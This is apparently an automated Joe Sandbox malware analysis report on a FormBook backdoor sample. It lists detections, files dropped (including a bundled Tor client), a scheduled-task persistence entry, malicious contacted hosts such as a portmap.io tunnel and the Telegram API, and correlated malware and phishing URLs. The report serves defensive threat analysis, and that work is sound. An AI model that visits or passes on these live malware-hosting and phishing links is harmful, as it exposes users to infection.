                Source | Detection | Scanner | Label | Link
                yt7dW9nyJK.exe | 42% | ReversingLabs | ByteCode-MSIL.Backdoor.FormBook |
                yt7dW9nyJK.exe | 100% | Joe Sandbox ML | |

                Source | Detection | Scanner | Label | Link
                C:\Users\user\AppData\Local\Starlabs\ffmaba.exe | 100% | Joe Sandbox ML | |
                C:\Users\user\AppData\Local\77rh3rhsc7\tor\libcrypto-1_1.dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent-2-1-7.dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent_core-2-1-7.dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent_extra-2-1-7.dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\77rh3rhsc7\tor\libgcc_s_sjlj-1.dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\77rh3rhsc7\tor\libssl-1_1.dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\77rh3rhsc7\tor\libssp-0.dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\77rh3rhsc7\tor\libwinpthread-1.dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-gencert.exe | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\77rh3rhsc7\tor\zlib1.dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\Starlabs\ffmaba.exe | 46% | ReversingLabs | ByteCode-MSIL.Backdoor.FormBook |
                C:\Users\user\AppData\Local\Temp\ffmaba.exe | 46% | ReversingLabs | ByteCode-MSIL.Backdoor.FormBook |
                No Antivirus matches
                No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
libyaalahrar.co | 199.188.200.89 | true | false | | unknown
github.com | 140.82.121.3 | true | false | | unknown
securefirewall.portmap.io | 193.161.193.99 | true | true | | unknown
ip-api.com | 208.95.112.1 | true | true | | unknown
api.telegram.org | 149.154.167.220 | true | true | | unknown
objects.githubusercontent.com | 185.199.108.133 | true | false | | unknown
                                unknown
                                https://sabotage.nettor-real.exe, 00000019.00000003.2480126236.0000000000F99000.00000004.00000020.00020000.00000000.sdmp, tor-real.exe, 00000019.00000003.2480334593.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp, tor-real.exe, 00000019.00000003.2465033062.0000000003B53000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://api.teleffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: safe
                                unknown
                                http://127.0.0.1:18772/handleOpenWSR?r=ffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://support.mozilla.orgffmaba.exe, 00000013.00000002.4541756048.0000000004169000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4541756048.0000000004161000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://bugs.torproject.org/tpo/core/tor/8742.tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.torproject.org/docs/faq.html#BestOSForRelaytor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=ffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
IP | Domain | Country | ASN | ASN Name | Malicious
193.161.193.99 | securefirewall.portmap.io | Russian Federation | 198134 | BITREE-ASRU | true
72.132.134.217 | unknown | United States | 20001 | TWC-20001-PACWESTUS | false
140.78.100.15 | unknown | Austria | 1205 | JKU-LINZ-ASUniversityLinzAT | false
140.82.121.3 | github.com | United States | 36459 | GITHUBUS | false
199.188.200.89 | libyaalahrar.co | United States | 22612 | NAMECHEAP-NETUS | false
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | true
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
95.217.36.40 | unknown | Germany | 24940 | HETZNER-ASDE | false
193.142.146.239 | unknown | Netherlands | 208046 | HOSTSLICK-GERMANYNL | false
51.158.147.144 | unknown | France | 12876 | OnlineSASFR | false
185.199.108.133 | objects.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false
148.251.191.252 | unknown | Germany | 24940 | HETZNER-ASDE | false
185.119.118.59 | unknown | Austria | 44133 | IPAX-ASAT | false
                                IP
                                127.0.0.1
                                Joe Sandbox version:40.0.0 Tourmaline
                                Analysis ID:1479415
                                Start date and time:2024-07-23 15:45:43 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 15m 33s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:48
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:yt7dW9nyJK.exe
                                renamed because original name is a hash value
                                Original Sample Name:adbe420a49db30f75d4665ea0014af43.exe
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@67/78@7/14
                                EGA Information:
                                • Successful, ratio: 87.5%
                                HCA Information:
                                • Successful, ratio: 56%
                                • Number of executed functions: 231
                                • Number of non-executed functions: 280
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, 6.d.a.8.b.e.f.b.0.0.0.0.0.0.0.0.4.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target powershell.exe, PID 7352 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                • Report size exceeded maximum capacity and may have missing network information.
                                • Report size getting too big, too many NtCreateKey calls found.
                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                • Report size getting too big, too many NtSetInformationFile calls found.
                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                • VT rate limit hit for: yt7dW9nyJK.exe
Time | Type | Description
09:46:33 | API Interceptor | 6538463x Sleep call for process: yt7dW9nyJK.exe modified
09:46:34 | API Interceptor | 136x Sleep call for process: powershell.exe modified
09:46:52 | API Interceptor | 5947138x Sleep call for process: ffmaba.exe modified
15:46:58 | Task Scheduler | Run new task: ffmaba path: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                208.95.112.1#U00d6deme Talimat#U01312024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                • ip-api.com/line/?fields=hosting
                                5i4hBrTNHm.rtfGet hashmaliciousAgentTeslaBrowse
                                • ip-api.com/line/?fields=hosting
                                SecuriteInfo.com.Win32.PWSX-gen.14778.18726.exeGet hashmaliciousAgentTeslaBrowse
                                • ip-api.com/line/?fields=hosting
                                po.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                • ip-api.com/line/?fields=hosting
                                DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                                • ip-api.com/line/?fields=hosting
                                Company Profile And PO.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                • ip-api.com/line/?fields=hosting
                                INV 66077.xlsGet hashmaliciousAgentTeslaBrowse
                                • ip-api.com/line/?fields=hosting
                                cotizaci#U00f2n.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                • ip-api.com/line/?fields=hosting
                                AZZASEC ransom (3).exeGet hashmaliciousXTEAM1916 RansomwareBrowse
                                • ip-api.com/line/?fields=hosting
                                AZZASEC ransom (2).exeGet hashmaliciousUnknownBrowse
                                • ip-api.com/line/?fields=hosting
                                193.161.193.99Yq5Gp2g2vB.exeGet hashmaliciousRedLineBrowse
                                • okmaq-24505.portmap.host:24505/
                                JnBNepHH7K.exeGet hashmaliciousAsyncRAT RedLineBrowse
                                • exara32-64703.portmap.host:64703/
                                99SKW728vf.exeGet hashmaliciousRedLineBrowse
                                • lottie9nwtina-55339.portmap.host:55339/
                                amazoninvoiceAF0388d83739dee83479171dbcf.exeGet hashmaliciousRedLineBrowse
                                • tete2792-22120.portmap.host:22120//
                                140.78.100.152y1JbYuXUD.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                  140.82.121.36glRBXzk6i.exeGet hashmaliciousRedLineBrowse
                                  • github.com/dyrka314/Balumba/releases/download/ver2/encrypted_ImpulseCrypt_5527713376.2.exe
                                  firefox.lnkGet hashmaliciousCobaltStrikeBrowse
                                  • github.com/john-xor/temp/blob/main/index.html?raw=true
                                  0XzeMRyE1e.exeGet hashmaliciousAmadey, VidarBrowse
                                  • github.com/neiqops/ajajaj/raw/main/file_22613.exe
                                  MzRn1YNrbz.exeGet hashmaliciousVidarBrowse
                                  • github.com/AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe
                                  RfORrHIRNe.docGet hashmaliciousUnknownBrowse
                                  • github.com/ssbb36/stv/raw/main/5.mp3
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  ip-api.com#U00d6deme Talimat#U01312024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • 208.95.112.1
                                  5i4hBrTNHm.rtfGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  SecuriteInfo.com.Win32.PWSX-gen.14778.18726.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  po.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • 208.95.112.1
                                  DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  Company Profile And PO.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                  • 208.95.112.1
                                  INV 66077.xlsGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  cotizaci#U00f2n.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  AZZASEC ransom (3).exeGet hashmaliciousXTEAM1916 RansomwareBrowse
                                  • 208.95.112.1
                                  AZZASEC ransom (2).exeGet hashmaliciousUnknownBrowse
                                  • 208.95.112.1
                                  github.com1C24TVT_00005055.pdf.jarGet hashmaliciousSTRRATBrowse
                                  • 140.82.121.3
                                  https://trk.klclick3.com/ls/click?upn=u001.F5FUvNp8lGuVBrfF8VWSt-2Befrq4JwHZUrXxYUllvBu6JQLRTleNqoOq9cK2V6H9nF6TE8i5ai18ELwuaCRLRwA-3D-3DeBON_1svWsHF9QtKh6I35BSRfJziCtreSweSmmjNgxUuzWxLFgb12Ddkvv3gPW-2BY7HCV4BtwDYPCgqFm6ezf3LGkFgw-2FasXzQ01tiusM7qj7f7wQzyFpk04U-2BNsOiH-2B6C0IEGGhuBHlH4nFGk5hM1YrilA-2FklNstU7j1vcFJG8iHzTeSRYHOXIpK0cVyPDdeQeDUKiYrTYys-2FJ6BSjWfQuGIzI8V57VImtAPAAkrpuUD31VELoL-2FwLqoqcEcJaE-2B6fpm2wPTZkCul8wgxqc4qQClvNSQEUdlWOW-2BnsmWvhHzUvBgdPRhNpiRMg8ZZ-2BBQBoSFlRkufcGBk8zdT6H-2B-2FULHcbxzCKE71NmfbhvHZ7lmXl2A-3DGet hashmaliciousTycoon2FABrowse
                                  • 140.82.121.3
                                  SecuriteInfo.com.Win32.Malware-gen.28268.20656.exeGet hashmaliciousUnknownBrowse
                                  • 140.82.121.9
                                  SecuriteInfo.com.Win32.Malware-gen.28268.20656.exeGet hashmaliciousUnknownBrowse
                                  • 140.82.121.9
                                  SecuriteInfo.com.Win32.Malware-gen.6320.5781.exeGet hashmaliciousXmrigBrowse
                                  • 140.82.121.5
                                  SecuriteInfo.com.FileRepMalware.29211.10793.exeGet hashmaliciousUnknownBrowse
                                  • 140.82.121.4
                                  SecuriteInfo.com.FileRepMalware.29211.10793.exeGet hashmaliciousUnknownBrowse
                                  • 140.82.121.4
                                  https://forms.office.com/r/dzbBwFxweMGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                  • 140.82.121.4
                                  objects.githubusercontent.comhttps://trk.klclick3.com/ls/click?upn=u001.F5FUvNp8lGuVBrfF8VWSt-2Befrq4JwHZUrXxYUllvBu6JQLRTleNqoOq9cK2V6H9nF6TE8i5ai18ELwuaCRLRwA-3D-3DeBON_1svWsHF9QtKh6I35BSRfJziCtreSweSmmjNgxUuzWxLFgb12Ddkvv3gPW-2BY7HCV4BtwDYPCgqFm6ezf3LGkFgw-2FasXzQ01tiusM7qj7f7wQzyFpk04U-2BNsOiH-2B6C0IEGGhuBHlH4nFGk5hM1YrilA-2FklNstU7j1vcFJG8iHzTeSRYHOXIpK0cVyPDdeQeDUKiYrTYys-2FJ6BSjWfQuGIzI8V57VImtAPAAkrpuUD31VELoL-2FwLqoqcEcJaE-2B6fpm2wPTZkCul8wgxqc4qQClvNSQEUdlWOW-2BnsmWvhHzUvBgdPRhNpiRMg8ZZ-2BBQBoSFlRkufcGBk8zdT6H-2B-2FULHcbxzCKE71NmfbhvHZ7lmXl2A-3DGet hashmaliciousTycoon2FABrowse
                                  • 185.199.110.133
                                  SecuriteInfo.com.Win32.Malware-gen.6320.5781.exeGet hashmaliciousXmrigBrowse
                                  • 185.199.110.133
                                  SecuriteInfo.com.FileRepMalware.29211.10793.exeGet hashmaliciousUnknownBrowse
                                  • 185.199.108.133
                                  SecuriteInfo.com.FileRepMalware.29211.10793.exeGet hashmaliciousUnknownBrowse
                                  • 185.199.109.133
                                  https://forms.office.com/r/dzbBwFxweMGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                  • 185.199.108.133
                                  https://api-internal.weblinkconnect.com/api/Communication/Communication/1148248/click?url=https://bromosemerutrekking.com/aa-checker%23Monica.pawelec%2Bfirstontario.com&x-tenant=WinterHavenFLCOCGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                  • 185.199.108.133
                                  Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                  • 185.199.109.133
                                  https://a.kerika.com/acc_39TXETMEnauTtVtsNzbfFJ/c/brd_4nvvo2ooyq8HxjaMzCxzZb/cnvs_BfJOZGet hashmaliciousTycoon2FABrowse
                                  • 185.199.109.133
                                  https://a.kerika.com/acc_39TXETMEnauTtVtsNzbfFJ/c/brd_4nvvo2ooyq8HxjaMzCxzZb/cnvs_BfJOZGet hashmaliciousTycoon2FABrowse
                                  • 185.199.110.133
                                  https://www.canva.com/design/DAGLTz418pg/uzEfbpRlOhsQ8izFqH7fIw/edit?utm_content=DAGLTz418pg&utm_campaign=designshare&utm_medium=link2&utm_source=sharebuttonGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                  • 185.199.111.133
                                  api.telegram.orgNATV0980090004.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 149.154.167.220
                                  Orden de Compra..exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                  • 149.154.167.220
                                  kHeNppYRgN.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 149.154.167.220
                                  QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 149.154.167.220
                                  Purchase Order - P04737.xlsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 149.154.167.220
                                  Fekdjuvq.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 149.154.167.220
                                  neworder.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 149.154.167.220
                                  ORDER INQUIRY_QTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 149.154.167.220
                                  PqeSvE23O1.exeGet hashmaliciousUnknownBrowse
                                  • 149.154.167.220
                                  Revised PI_2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                  • 149.154.167.220
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  BITREE-ASRUSecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                  • 193.161.193.99
                                  SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                  • 193.161.193.99
                                  SecuriteInfo.com.Win32.RATX-gen.31110.7671.exeGet hashmaliciousXWormBrowse
                                  • 193.161.193.99
                                  SecuriteInfo.com.Win32.CrypterX-gen.2593.22035.exeGet hashmaliciousXWormBrowse
                                  • 193.161.193.99
                                  0aXmWlKxOj.exeGet hashmaliciousXWormBrowse
                                  • 193.161.193.99
                                  DriverUpdt.exeGet hashmaliciousXWormBrowse
                                  • 193.161.193.99
                                  password.exeGet hashmaliciousSugarDump, XWormBrowse
                                  • 193.161.193.99
                                  Project Al Ain (Hilli & Al Fou#U2019ah) Parks.vbeGet hashmaliciousStormKitty, XWormBrowse
                                  • 193.161.193.99
                                  9Ok3QP5FFV.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                  • 193.161.193.99
                                  Client.exeGet hashmaliciousQuasarBrowse
                                  • 193.161.193.99
                                  TWC-20001-PACWESTUS3B4ehVz4C4.elfGet hashmaliciousMiraiBrowse
                                  • 76.90.38.219
                                  PoksxEQkb8.elfGet hashmaliciousUnknownBrowse
                                  • 104.32.81.111
                                  BeI1uexfjo.elfGet hashmaliciousUnknownBrowse
                                  • 172.115.197.199
                                  desDGzeznq.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                  • 157.233.213.255
                                  92.249.48.47-skid.arm7-2024-07-20T09_04_19.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 67.58.153.89
                                  92.249.48.47-skid.arm-2024-07-20T09_04_18.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 98.152.4.154
                                  92.249.48.47-skid.mips-2024-07-20T09_04_16.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 23.242.138.178
                                  Qa5qvgWyUn.elfGet hashmaliciousMiraiBrowse
                                  • 172.250.164.146
                                  http://Ccbportal.synology.meGet hashmaliciousUnknownBrowse
                                  • 98.153.95.52
                                  XfStyH0fNY.elfGet hashmaliciousMiraiBrowse
                                  • 24.43.195.247
                                  JKU-LINZ-ASUniversityLinzATj980HN1yJw.elfGet hashmaliciousUnknownBrowse
                                  • 140.78.3.221
                                  jew.mpsl.elfGet hashmaliciousUnknownBrowse
                                  • 140.78.202.172
                                  1B7E3FLOXC.elfGet hashmaliciousUnknownBrowse
                                  • 140.78.21.186
                                  W0RBRi467A.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 140.78.249.188
                                  tjC7CVWKsG.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 140.78.249.188
                                  TF2AD5Jnbu.elfGet hashmaliciousUnknownBrowse
                                  • 140.78.114.191
                                  mpsl-20240205-0055.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 140.78.114.188
                                  huhu.mips.elfGet hashmaliciousMiraiBrowse
                                  • 140.78.202.120
                                  aGm9hyTGHd.elfGet hashmaliciousUnknownBrowse
                                  • 140.78.249.192
                                  Kx2DIIG67J.exeGet hashmaliciousBazaLoader, SmokeLoaderBrowse
                                  • 140.78.100.43
                                  GITHUBUS1C24TVT_00005055.pdf.jarGet hashmaliciousSTRRATBrowse
                                  • 140.82.121.3
                                  https://trk.klclick3.com/ls/click?upn=u001.F5FUvNp8lGuVBrfF8VWSt-2Befrq4JwHZUrXxYUllvBu6JQLRTleNqoOq9cK2V6H9nF6TE8i5ai18ELwuaCRLRwA-3D-3DeBON_1svWsHF9QtKh6I35BSRfJziCtreSweSmmjNgxUuzWxLFgb12Ddkvv3gPW-2BY7HCV4BtwDYPCgqFm6ezf3LGkFgw-2FasXzQ01tiusM7qj7f7wQzyFpk04U-2BNsOiH-2B6C0IEGGhuBHlH4nFGk5hM1YrilA-2FklNstU7j1vcFJG8iHzTeSRYHOXIpK0cVyPDdeQeDUKiYrTYys-2FJ6BSjWfQuGIzI8V57VImtAPAAkrpuUD31VELoL-2FwLqoqcEcJaE-2B6fpm2wPTZkCul8wgxqc4qQClvNSQEUdlWOW-2BnsmWvhHzUvBgdPRhNpiRMg8ZZ-2BBQBoSFlRkufcGBk8zdT6H-2B-2FULHcbxzCKE71NmfbhvHZ7lmXl2A-3DGet hashmaliciousTycoon2FABrowse
                                  • 140.82.121.3
                                  SecuriteInfo.com.Win32.Malware-gen.28268.20656.exeGet hashmaliciousUnknownBrowse
                                  • 140.82.121.9
                                  SecuriteInfo.com.Win32.Malware-gen.28268.20656.exeGet hashmaliciousUnknownBrowse
                                  • 140.82.121.9
                                  SecuriteInfo.com.Win32.Malware-gen.6320.5781.exeGet hashmaliciousXmrigBrowse
                                  • 140.82.121.5
                                  http://tokelp0cket.top/Get hashmaliciousUnknownBrowse
                                  • 140.82.121.6
                                  SecuriteInfo.com.FileRepMalware.29211.10793.exeGet hashmaliciousUnknownBrowse
                                  • 140.82.121.4
                                  SecuriteInfo.com.FileRepMalware.29211.10793.exeGet hashmaliciousUnknownBrowse
                                  • 140.82.121.4
                                  https://exodus-wllet.github.io/Get hashmaliciousUnknownBrowse
                                  • 140.82.114.22
                                  https://suryapratap06.github.io/netflix-cloneGet hashmaliciousHTMLPhisherBrowse
                                  • 140.82.112.17
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  3b5074b1b5d032e5620f69f9f700ff0ehttps://cdp3.tracking.e360.salesforce.com/click?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0ZW5hbnRfaWQiOiJhMzYwL3Byb2QvNzJlOTY4NTBhOWZiNGE2ZWE0MGY0N2JjMzQ0NzQxOWIiLCJjcmVhdGlvbl90aW1lIjoxNzIxNzI5NzE0LCJtZXNzYWdlX2lkIjoiMGhtbWRwZ3d4ejU5cTJiZzU4eWRhem01I2ViOTU2OGFlLTUxMDEtNDRmOC1iYmM1LWNkYjdhMTU0MmZhOCIsImNoYW5uZWxfdHlwZSI6ImVtYWlsIiwiZXhwIjoxNzUzMjY1NzE0LCJyZWRpcmVjdF91cmwiOiJodHRwczovL21hY3Bob3RvZ3JhcGh5Lm9yZyIsImluZGl2aWR1YWxfaWQiOiIwMFFhbTAwMDAwQTVaYzVFQUYifQ.n1MJx5qXzIyes_2paKdgiE1L8vPLZY6s0PjxhlIpfl0Get hashmaliciousHTMLPhisherBrowse
                                  • 185.199.108.133
                                  • 149.154.167.220
                                  • 140.82.121.3
                                  • 199.188.200.89
                                  Frutas Nuevo Orden.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • 185.199.108.133
                                  • 149.154.167.220
                                  • 140.82.121.3
                                  • 199.188.200.89
                                  NATV0980090004.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 185.199.108.133
                                  • 149.154.167.220
                                  • 140.82.121.3
                                  • 199.188.200.89
                                  Orden de Compra..exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                  • 185.199.108.133
                                  • 149.154.167.220
                                  • 140.82.121.3
                                  • 199.188.200.89
                                  BL NBNSA240600050.xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • 185.199.108.133
                                  • 149.154.167.220
                                  • 140.82.121.3
                                  • 199.188.200.89
                                  Cotizaci#U00f3n.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • 185.199.108.133
                                  • 149.154.167.220
                                  • 140.82.121.3
                                  • 199.188.200.89
                                  Doc_322_0105.exeGet hashmaliciousAgentTeslaBrowse
                                  • 185.199.108.133
                                  • 149.154.167.220
                                  • 140.82.121.3
                                  • 199.188.200.89
                                  4Ear91jgQ7.exeGet hashmaliciousFormBookBrowse
kHeNppYRgN.exe | malicious | Snake Keylogger, VIP Keylogger
QUOTATION_JULQTRA071244#U00faPDF.scr.exe | malicious | Unknown
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\77rh3rhsc7\tor\libcrypto-1_1.dll | 7h2eHzSa61.exe | malicious | Gurcu Stealer, WhiteSnake Stealer
 | file.exe | malicious | Gurcu Stealer
 | SqhpdzwbpB.exe | malicious | Gurcu Stealer
 | jtfCFDmLdX.exe | malicious | Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT
 | vSlVoTPrmP.exe | malicious | Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT
 | RO67OsrIWi.exe | malicious | Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT
 | NxrkCS4fDD.exe | malicious | Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT
 | 7WOfaFsPQv.exe | malicious | Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT
 | Rgi3BxJNQJ.exe | malicious | Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, Xmrig, zgRAT
 | 2y1JbYuXUD.exe | malicious | Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT
C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent-2-1-7.dll | 7h2eHzSa61.exe | malicious | Gurcu Stealer, WhiteSnake Stealer
 | file.exe | malicious | Gurcu Stealer
 | SqhpdzwbpB.exe | malicious | Gurcu Stealer
 | jtfCFDmLdX.exe | malicious | Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT
 | vSlVoTPrmP.exe | malicious | Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT
 | RO67OsrIWi.exe | malicious | Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT
 | NxrkCS4fDD.exe | malicious | Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT
 | 7WOfaFsPQv.exe | malicious | Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT
 | Rgi3BxJNQJ.exe | malicious | Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, Xmrig, zgRAT
 | 2y1JbYuXUD.exe | malicious | Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):4
                                                                          Entropy (8bit):2.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:D:D
                                                                          MD5:B19AA25FF58940D974234B48391B9549
                                                                          SHA1:24557894C02F75B94D15DE2291E863852773D98B
                                                                          SHA-256:7929065522441D4053CBA7EBFFB2D224585A110B13840FF69CF0E89B725AF9E7
                                                                          SHA-512:1240F82A2FDF0EBF392D4D3A558338B9767753D73CD5C010FD5B959F89E0276506C287A480D7B7B278B76B28B462EC682AD9B01BE327565704C8C4C05EFABE0F
                                                                          Malicious:false
                                                                          Preview:2789
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:very short file (no magic)
                                                                          Category:modified
                                                                          Size (bytes):1
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:U:U
                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                          Malicious:false
                                                                          Preview:1
                                                                          Process:C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):13668
                                                                          Entropy (8bit):6.049720858632598
